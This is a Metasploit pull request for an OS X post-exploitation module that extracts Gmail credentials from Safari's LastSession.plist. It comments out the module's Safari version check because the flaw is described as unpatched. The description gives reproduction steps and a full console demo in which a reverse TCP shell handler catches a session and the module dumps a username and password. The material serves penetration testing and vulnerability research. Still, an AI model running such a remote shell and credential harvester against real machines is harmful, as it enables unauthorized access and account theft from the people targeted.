### PR TITLE
Updates description and improves regex for safari_lastsession.rb

### DIFF
--- a/modules/post/osx/gather/safari_lastsession.rb
+++ b/modules/post/osx/gather/safari_lastsession.rb
@@ -183,6 +183,7 @@ class Metasploit3 < Msf::Post
     #
     # If this is an unpatched version, we try to extract creds
     #
+=begin
     version = get_safari_version
     if version.blank?
       print_warning("Unable to determine Safari version, will try to extract creds anyway")
@@ -192,6 +193,7 @@ class Metasploit3 < Msf::Post
     else
       vprint_status("#{peer} - Safari version: #{version}")
     end
+=end
 
     #
     # Attempts to convert the XML file to an actual XML object, with the <array> element


### PR DESCRIPTION
This updates two things for the safari_lastsession post module:
1. The description is updated: More information is added to describe how Safari would end up storing the Gmail credential in the last session state, and what it means to you as an attacker.
2. Regex update for the domain to search for: Before the module starts extract the session data, it needs to know which domain to extract from. Originally I only added mail.google.com, but turns out the sensitive info can be found in accounts.google.com, so I added that one.

You can make Safari store the session state w/ your credential if you do the following:
- [x] First make sure you get a OS X shell with Metasploit
- [x] Make sure you clear the cache for Safari (Preferences -> Privacy -> Remove All Website Data)
- [x] Go to https://accounts.google.com/ServiceLoginAuth
- [x] Enter an incorrect password and try to login
- [x] Refresh
- [x] Run `post/osx/gather/safari_lastsession`

Here's a demo:

```
$ msfconsole -q
msf > use exploit/multi/handler 
msf exploit(handler) > set payload osx/x64/shell_reverse_tcp
payload => osx/x64/shell_reverse_tcp
msf exploit(handler) > set lhost 10.0.1.76
lhost => 10.0.1.76
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
msf exploit(handler) > [*] Command shell session 1 opened (10.0.1.76:4444 -> 10.0.1.76:53196) at 2013-12-24 14:14:23 -0600

msf exploit(handler) > use post/osx/gather/safari_lastsession 
msf post(safari_lastsession) > set verbose true
verbose => true
msf post(safari_lastsession) > set session 1
session => 1
msf post(safari_lastsession) > run

[*] 10.0.1.76:53196 - Looking for LastSession.plist
[+] 10.0.1.76:53196 - LastSession.plist stored in: /.msf4/loot/20131224141439_default_10.0.1.76_osx.lastsession._746216.txt
[*] 10.0.1.76:53196 - Checking Safari version.
[*] 10.0.1.76:53196 - Safari version: 6.0.5
[*] 10.0.1.76:53196 - Looking for username/password for Gmail.
[+] 10.0.1.76:53196 - Found credential saved in: /.msf4/loot/20131224141439_default_10.0.1.76_osx.lastsession._298919.txt

Credentials
===========

 Domain           Username    Password
 ------           --------    --------
 mail.google.com  myusername  mypassword
```

Note: The security issue still exists in Safari 6.1.1 and 7.0, so I disabled version check for now until there's a patch.
